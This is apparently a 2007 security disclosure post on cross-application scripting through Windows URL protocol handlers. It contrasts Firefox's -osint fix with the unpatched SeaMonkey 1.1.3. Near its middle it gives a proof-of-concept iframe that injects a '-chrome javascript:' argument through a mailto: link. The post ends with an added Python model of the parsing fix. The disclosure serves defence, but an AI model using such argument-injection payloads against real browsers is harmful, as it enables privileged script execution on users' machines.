This is just a quick note to detail what other people have no doubt found as well.
The Mozilla Corporation released Firefox 2.0.0.5 on July 17, followed by the release of Thunderbird 2.0.0.5 on July 19. Each of those releases tightened up the input validation performed on command line arguments, particularly to disallow other browsers from abusing them as attack vectors via inbound arguments.
This was achieved by specifying a further command line argument called -osint, for “operating system internal”, which was appended to any of their registered URL protocol handlers. Previously, the FirefoxURL protocol handler looked similar to the following:
C:\PROGRA~1\MOZILL~3\FIREFOX.EXE -requestPending -url "%1"
Whereas after Firefox 2.0.0.5 the same protocol handler was changed to:
C:\PROGRA~1\MOZILL~3\FIREFOX.EXE -requestPending -osint -url "%1"
Whenever the application sees that an -osint flag has been specified it will first determine the argument name and then use the remainder of the command line as the argument value, disrupting the potential for external applications such as Internet Explorer to abuse them as attack vectors.
SeaMonkey 1.1.3 was released on July 16 but does not include this modification. As such it is still possible to perform cross application scripting on SeaMonkey from other browsers, such as Internet Explorer, which still do not escape command line arguments to URL protocol handler applications.
Firefox could be used as an attack vector through its FirefoxURL protocol handler, but SeaMonkey has not yet included the required SeaMonkeyURL protocol which would give it Vista compatibility. It does, however, register itself as the handler for protocols such as gopher: and mailto:, the latter of which we can then use as an attack vector with the following POC exploit.
<html><body>
<iframe src='mailto:m -chrome "javascript:alert(1)'>
</body></html>
You can also find the above demonstration exploit at All it does is launch SeaMonkey with the following command line arguments.
SeaMonkey.exe -compose mailto:me@nowhere.com -chrome "javascript:alert(1)
And there you have it. Mozilla might have bailed out Microsoft once with their previous security update, but they have yet to release an updated version of SeaMonkey which removes this attack vector. You can still exploit Internet Explorer simply by substituting “FirefoxURL” with “mailto” in your exploit
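The following is an added example, not code from the original post or from Mozilla: a simplified Python model of the -osint behaviour described above, applied to the SeaMonkey command line shown earlier. The tokenizer is a simplification of Windows quoting rules, and the -osint form of the SeaMonkey command line is hypothetical, since SeaMonkey 1.1.3 does not include the flag.

```python
def tokenize(cmdline):
    """Simplified splitter (assumption, not the full Windows CRT rules):
    whitespace separates tokens, double quotes group. Returns (token, end_offset)."""
    tokens, buf, in_quotes, started = [], [], False, False
    for i, ch in enumerate(cmdline):
        if ch == '"':
            in_quotes, started = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if started:
                tokens.append(("".join(buf), i))
                buf, started = [], False
        else:
            buf.append(ch)
            started = True
    if started:
        tokens.append(("".join(buf), len(cmdline)))
    return tokens

def parse_legacy(cmdline):
    """Model without -osint: every token starting with '-' is honoured as a flag."""
    toks = [t for t, _ in tokenize(cmdline)][1:]  # drop the program name
    flags = {}
    for i, tok in enumerate(toks):
        if tok.startswith("-"):
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            flags[tok[1:]] = nxt if nxt and not nxt.startswith("-") else None
    return flags

def parse_osint(cmdline):
    """Model of the post's description: after -osint, read one argument name and
    treat the whole remainder of the command line as that argument's value."""
    toks = tokenize(cmdline)[1:]
    names = [t for t, _ in toks]
    if "-osint" not in names:
        return parse_legacy(cmdline)
    pos = names.index("-osint")
    flags = {t[1:]: None for t in names[:pos] if t.startswith("-")}
    if pos + 1 < len(toks):
        name, name_end = toks[pos + 1]
        flags[name.lstrip("-")] = cmdline[name_end:].strip().strip('"')
    return flags

# Command line quoted in the post, and a hypothetical -osint variant of it.
SEAMONKEY_CMD = 'SeaMonkey.exe -compose mailto:me@nowhere.com -chrome "javascript:alert(1)'
SEAMONKEY_OSINT = 'SeaMonkey.exe -osint -compose mailto:me@nowhere.com -chrome "javascript:alert(1)'
# Post-2.0.0.5 handler from the post; the example.com URL is a constructed sample.
FIREFOX_HANDLER = r'C:\PROGRA~1\MOZILL~3\FIREFOX.EXE -requestPending -osint -url "%1"'

if __name__ == "__main__":
    print(parse_legacy(SEAMONKEY_CMD))    # -chrome is honoured as its own flag
    print(parse_osint(SEAMONKEY_OSINT))   # -chrome stays inside the -compose value
    print(parse_osint(FIREFOX_HANDLER.replace("%1", "http://example.com/")))
```

In the legacy model the injected -chrome token is parsed as a separate flag, while in the -osint model it is only inert text inside the single -compose value.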